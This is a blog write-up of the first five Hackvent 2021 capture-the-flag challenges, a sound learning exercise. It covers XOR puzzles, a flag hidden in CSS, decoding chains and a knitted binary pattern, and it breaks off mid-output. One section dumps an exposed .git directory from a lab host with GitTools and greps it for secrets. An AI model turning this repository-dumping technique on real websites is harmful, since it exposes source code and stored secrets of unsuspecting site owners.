{"id":1696,"date":"2021-12-28T20:35:19","date_gmt":"2021-12-28T20:35:19","guid":{"rendered":"https:\/\/sigterm.ch\/?p=1696"},"modified":"2022-12-26T19:17:40","modified_gmt":"2022-12-26T18:17:40","slug":"hackvent-2021-write-up","status":"publish","type":"post","link":"https:\/\/sigterm.ch\/?p=1696","title":{"rendered":"HACKvent 2021 Write-up"},"content":{"rendered":"\n<p>Hackvent 2021 is over! <br>Once again, this year&#8217;s Hackvent was terrific &#8211; even though it was uncertain until the start whether it would take place at all. Eventually, the event was a traditional, full-blown Hackvent! Thanks to all challenge contributors who made this possible. I especially loved both Blockchain challenges, the binary exploitation on day 14, and the reverse engineering challenge on day 22. Less pleasant was the fact that some challenges were very resource-intensive this year. Some challenges took several hours of computing time on my laptop.<br>This year I did manage to complete all the challenges. Unfortunately, not all of them within 24 hours to get the total score. I submitted the flag for three challenges late (day 10, 17, and 19). And like every year, I liked the discussions around the CTF very much. Shouts to ice, jokker, ludus, DrSchottky, and all other participants.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"320\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-1024x320.png\" alt=\"\" class=\"wp-image-1697\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-1024x320.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-300x94.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-768x240.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-1536x480.png 1536w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-2048x639.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">https:\/\/ranking.competition.hacking-lab.com\/<\/figcaption><\/figure>\n\n\n\n<!--more-->\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.01] X-wORd Puzzle<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"832\" height=\"102\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-1.png\" alt=\"\" class=\"wp-image-1698\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-1.png 832w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-1-300x37.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-1-768x94.png 768w\" sizes=\"auto, (max-width: 832px) 100vw, 832px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>It seems the elves have sent us a message via a newspaper crossword puzzle. Can you solve it to find out what they want to tell us?<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"793\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/cb6e641a-5acf-4c2d-9d4f-380a45aad536-1024x793.png\" alt=\"\" class=\"wp-image-1699\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/cb6e641a-5acf-4c2d-9d4f-380a45aad536-1024x793.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/cb6e641a-5acf-4c2d-9d4f-380a45aad536-300x232.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/cb6e641a-5acf-4c2d-9d4f-380a45aad536-768x595.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/cb6e641a-5acf-4c2d-9d4f-380a45aad536-1536x1189.png 1536w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/cb6e641a-5acf-4c2d-9d4f-380a45aad536.png 1790w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Instructions<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Fill in the puzzle in all capital letters<\/li>\n\n\n\n<li>The initial letters of each word are the solution &#8211; in order the same order the questions are asked:\n<ul class=\"wp-block-list\">\n<li>horizontal words: top to bottom<\/li>\n\n\n\n<li>vertical words: left to right<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Horizontal<\/h3>\n\n\n\n<ol class=\"wp-block-list\">\n<li>A diagram of arrows not allowing cycles<\/li>\n\n\n\n<li>A handbag for carrying around money<\/li>\n\n\n\n<li>Very, very secure<\/li>\n\n\n\n<li>Golf: number of strokes required<\/li>\n\n\n\n<li>Congo between 1971 and 1997<\/li>\n\n\n\n<li>State of appearing everywhere<\/li>\n\n\n\n<li>Tuples in everyday language<\/li>\n\n\n\n<li>Makes you laugh or silences you<\/li>\n<\/ol>\n\n\n\n<h3 class=\"wp-block-heading\">Vertical<\/h3>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Plea by many doctors right now<\/li>\n\n\n\n<li>Put in parcels<\/li>\n\n\n\n<li>Lets you change user<\/li>\n\n\n\n<li>&#8230;-test<\/li>\n\n\n\n<li>How you should transmit your data<\/li>\n\n\n\n<li>Need to squash them &#8211; fix your code!<\/li>\n\n\n\n<li>Attributed to a marquis &#8211; no pain, no gain.<\/li>\n\n\n\n<li>Doing something in a way that causes fatigue is doing it&#8230;<\/li>\n\n\n\n<li>A drink you may need after finishing this puzzle.<\/li>\n<\/ol>\n\n\n\n<h2 class=\"wp-block-heading\">Hints<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>the words are in order (ltr &amp; ttb): first hint is for the top left horizontal word<\/li>\n\n\n\n<li>number means number of chars in word<\/li>\n\n\n\n<li>check the title &#8211; do you need all the letters?<\/li>\n\n\n\n<li>we know how to hide gridlines<\/li>\n\n\n\n<li>what seems redundant really isn&#8217;t &#8211; it&#8217;s the key you seek<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>With Google and the instructions it was more or less straight forward to find most of the needed words. <br>It was unclear how to generate the flag in the end, tough. According to the hint in the picture (XOR sign) the challenge category (crypto) and the title (XOR) it became abvious at some point that a XOR operation had to be computed. After some guessing I&#8217;ve found out that the initial letter of each word had to be xored with the character-length of the word. The number needs to be interpreted in ASCII, not as number. <\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"589\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/words-1-1-1024x589.jpeg\" alt=\"\" class=\"wp-image-1755\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/words-1-1-1024x589.jpeg 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/words-1-1-300x173.jpeg 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/words-1-1-768x442.jpeg 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/words-1-1-1536x883.jpeg 1536w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/words-1-1.jpeg 1749w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>I created an additional Excel file to help me solve this challenge. <\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-44-1-1024x420.png\" alt=\"\" class=\"wp-image-1756\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV{welcometohackvent}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.02] No source, No luck!<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"828\" height=\"102\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-2.png\" alt=\"\" class=\"wp-image-1700\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-2.png 828w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-2-300x37.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-2-768x95.png 768w\" sizes=\"auto, (max-width: 828px) 100vw, 828px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>explo1t<\/em>. There were no elves harmed during its creation.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>Now they&#8217;re just trolling you, aren&#8217;t they? They said there would be a flag, but now they&#8217;re not even talking to us for real, just shoving us along \ud83d\ude24 No manners, they got!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>If we visit the website we get &#8220;rick-rolled&#8221; by being redirected to this <a rel=\"noreferrer noopener\" href=\"https:\/\/www.youtube.com\/watch?v=dQw4w9WgXcQ\" target=\"_blank\">youtube-video<\/a>. Analyzing the link with curl led straight to the flag:<\/p>\n\n\n<p>$ curl 2022e71f-12f7-4d18-8b0c-51b42d14d349.idocker.vuln.land-v -L<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-5-1024x400.png\" alt=\"\" class=\"wp-image-1703\"\/><\/figure>\n\n\n\n<p>We can see that the file style.css is loaded. Let&#8217;s look closer at the CSS file: <\/p>\n\n\n<p>$ curl 2022e71f-12f7-4d18-8b0c-51b42d14d349.idocker.vuln.land\/style.css -v -L<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"989\" height=\"1024\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-4-989x1024.png\" alt=\"\" class=\"wp-image-1702\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-4-989x1024.png 989w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-4-290x300.png 290w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-4-768x795.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-4.png 1400w\" sizes=\"auto, (max-width: 989px) 100vw, 989px\" \/><\/figure>\n\n\n\n<p>The flag is just there in the &#8220;body::after&#8221; element.<\/p>\n\n\n\n<p><strong>Flag<\/strong><\/p>\n\n\n\n<p>HV21{h1dd3n_1n_css}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.03] Too Much GlItTer!<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"824\" height=\"110\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-6.png\" alt=\"\" class=\"wp-image-1705\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-6.png 824w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-6-300x40.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-6-768x103.png 768w\" sizes=\"auto, (max-width: 824px) 100vw, 824px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>HaCk0<\/em>. The reindeer helped!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>To celebrate Christmas even more the elves have setup a small website to help promote christmas on the internet. It is currently under heavy development but they wanted to show it off anyhow.<\/p>\n\n\n\n<p>Unfortunately they made a pretty silly error which threatens the future of their project.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Goal<\/h2>\n\n\n\n<p>Can you help them find the vulnerability and retrieve the flag?<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>When we open the URL this website is presented to us:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"675\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-7-1024x675.png\" alt=\"\" class=\"wp-image-1706\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-7-1024x675.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-7-300x198.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-7-768x506.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-7-1536x1013.png 1536w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-7-2048x1350.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>According to the challenge title it was very clear to me that this challenge has something to do with GIT. Consequently, I tried to browse to the .git directory. And voila:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"526\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-8-1024x526.png\" alt=\"\" class=\"wp-image-1707\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-8-1024x526.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-8-300x154.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-8-768x395.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-8.png 1486w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>The next steps are very straight forward. I used <a rel=\"noreferrer noopener\" href=\"https:\/\/github.com\/internetwache\/GitTools\" target=\"_blank\">GitTools<\/a> to download all commits and branches of the repository and looked for the flag with grep. <\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">$ .\/Dumper\/gitdumper.sh 87bb6e71-a303-4ea8-9a9c-90de760d0c97.idocker.vuln.land\/.git\/ git<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-48-1024x913.png\" alt=\"\" class=\"wp-image-1760\"\/><\/figure>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">$ .\/Extractor\/extractor.sh git\/ extr\/<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-47-1024x435.png\" alt=\"\" class=\"wp-image-1759\"\/><\/figure>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">$ grep -Rnsi \"HV{\" extr\/\nextr\/1-b009ea9155d990aa9185e1157aaf583a636e93fd\/flag.html:63:        &lt;span style=\"font-size: 12pt !important;\">Here is the flag: HV{n3V3r_Sh0w_Y0uR_.git}&lt;\/span><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV{n3V3r_Sh0w_Y0uR_.git}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.04] Christmas in Babylon<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"828\" height=\"108\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-9.png\" alt=\"\" class=\"wp-image-1708\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-9.png 828w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-9-300x39.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-9-768x100.png 768w\" sizes=\"auto, (max-width: 828px) 100vw, 828px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>2d3<\/em>. They understand all the elves!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>Something weird happened to the elves, suddenly when one says something, there&#8217;s a number of the others required to translate what they mean. It only becomes clear in the end.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Goal<\/h2>\n\n\n\n<p>Can you help Santa understand what&nbsp;<a href=\"https:\/\/sigterm.ch\/stuff\/hv21\/03960b75-2139-47ca-9b99-0cf6b4ec6c60.zip\" target=\"_blank\" rel=\"noreferrer noopener\">they&#8217;re saying<\/a>?<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p><a href=\"https:\/\/sigterm.ch\/stuff\/hv21\/code04.py\" target=\"_blank\" rel=\"noreferrer noopener\">Step 1 &#8211; C# &#8211; Decode with Python<\/a>:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">import base64\n'''\nusing System;\nusing System.Text;\nusing static System.Console;\nvoid Rev(string s){\nvar chars=Encoding.ASCII.GetString(Convert.FromBase64String(s)).ToCharArray();\nArray.Reverse(chars);WriteLine(new string(chars));\n}'''\ndef Rev(inp):\n\tdecoded = base64.b64decode(inp).decode('utf-8')\n\tprint(decoded[::-1])\nRev(\"KzgrKitoKysrKysreysrKysraSsvPiswK3krKz4oKysrKysrICsrPlQrKysrKysrKyt9KysrPlsrVCsrK3grKysr\");\nRev(\"K2srICsrKysyKyt9KysrKysrPisrKytVKysrKysrKysrPisrNSsrKysrK3wrKysrNT4rKysrRCs2KytyKysqKz4r\");\nRev(\"K0MrKysrKysrMj4rKytqKyArKysrKytMKysrICsrbys+KysrKysrKysrKys+KysgKytNKysraStQKysrditxKys+\");\n...<\/pre>\n\n\n\n<p>Step 2 &#8211; Running the Python-scripts results in <a rel=\"noreferrer noopener\" href=\"https:\/\/sigterm.ch\/stuff\/hv21\/code04.bf\" target=\"_blank\">Brainfuck-Code<\/a>. We can run this code on the website <a rel=\"noreferrer noopener\" href=\"https:\/\/copy.sh\/brainfuck\/\" target=\"_blank\">https:\/\/copy.sh\/brainfuck\/<\/a>.<\/p>\n\n\n\n<p>Step 3 &#8211; The Brainfuck code returns a <a rel=\"noreferrer noopener\" href=\"https:\/\/sigterm.ch\/stuff\/hv21\/code04.sh\" target=\"_blank\">Bash-script<\/a>.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"shell\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">$ .\/code.sh > code.c<\/pre>\n\n\n\n<p>Step 4 &#8211; The <a rel=\"noreferrer noopener\" href=\"https:\/\/sigterm.ch\/stuff\/hv21\/code04.c\" target=\"_blank\">next output<\/a> is a Python script and a C code at the same time. The Python code wants a password. Let&#8217;s try with C first:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"shell\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">$ gcc -o code code.c\n$ .\/code\nC+Python=Cython?<\/pre>\n\n\n\n<p>Step 5 &#8211; We use the output from the compiled C program as input for the Python script. (This took me a while to guess)<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"shell\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">$ python3 code.c > code.php\nC+Python=Cython?<\/pre>\n\n\n\n<p>Step 6 &#8211; The output of the python script is a <a href=\"https:\/\/sigterm.ch\/stuff\/hv21\/code04.php\" target=\"_blank\" rel=\"noreferrer noopener\">PHP file<\/a><\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"shell\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">$ php code.php > code.js<\/pre>\n\n\n\n<p>Step 7 &#8211; The last file we got is a <a rel=\"noreferrer noopener\" href=\"https:\/\/sigterm.ch\/stuff\/hv21\/code04.js\" target=\"_blank\">JavaScript file<\/a> &#8211; although it is not readable at all (<a rel=\"noreferrer noopener\" href=\"https:\/\/jsfuck.com\" target=\"_blank\">jsfuck.com<\/a>). We can execute it in <a rel=\"noreferrer noopener\" href=\"https:\/\/jsfiddle.net\" target=\"_blank\">https:\/\/jsfiddle.net<\/a> and get the flag. <\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV21{-T00-many-weird-L4NGU4GE5-}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.05] X-Mas Jumper<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"834\" height=\"112\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-10.png\" alt=\"\" class=\"wp-image-1710\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-10.png 834w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-10-300x40.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-10-768x103.png 768w\" sizes=\"auto, (max-width: 834px) 100vw, 834px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>monkey<\/em>. Tight knitting!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>The elves have been getting into the festive spirit by making Christmas jumpers for themselves to wear in the workshop. They made one for Santa too, but it looks like they didn&#8217;t program the knitting machine correctly.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"494\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-16-1024x494.png\" alt=\"\" class=\"wp-image-1716\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-16-1024x494.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-16-300x145.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-16-768x371.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-16-1536x741.png 1536w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-16.png 1766w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Goal<\/h2>\n\n\n\n<p>Can you untangle this mess and find the pattern they were trying to make?<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>I manually wrote down the pattern as follows: white -&gt; 0, red -&gt; 1. I ignored the two rows on each side. This results in this binary pattern:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">111001111110011100101111111000000000001000010010\n000100100100100100000000000100001001000010010010\n010010011000110011111100100001010000001000010010\n100101000010001001000100000100001001010010100001\n000100100010000010000100101001010000100001100001\n000001000010010100111100111000100000010001110000\n110001100000000000000000000000000000000000000000\n000011100110011100000000000111000000000000100010\n010001000000000001000000000000010010000001001101\n110110100000000000001110000011000010010010010000\n000000000100100000010001001001001000000000000010\n010000001001001001001000000000000001001000100010\n001101100010000111111001110011001110000010100011\n111100000000000000000000000000000000000000000000\n001111111001111001111100000000000000000010000101\n000010010001000000000000000001111000100011001000\n010000000000000000100100010010100100001000000000\n000000010000001010010010001000000000000000001000\n000110001001111000000000000000000100000010000100\n100010000000011111100111000000111100110001001111\n110000000000000000000000000000011000000110000110\n000000011100000000000010010001000010000000000100\n000000000011100100100001001000100010000000111001\n110010001000101100110001000000100010111000100011\n110010001000100000011111001000100000001001000100\n010000001000000100010000001000100010001000010100\n010000001001111000001110101111110001110001001000<\/pre>\n\n\n\n<p>In a next step I replaced the 1 with a black unicode block and the 0 with a white unicode block. <\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1b\u2b1b\u2b1b\u2b1b\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b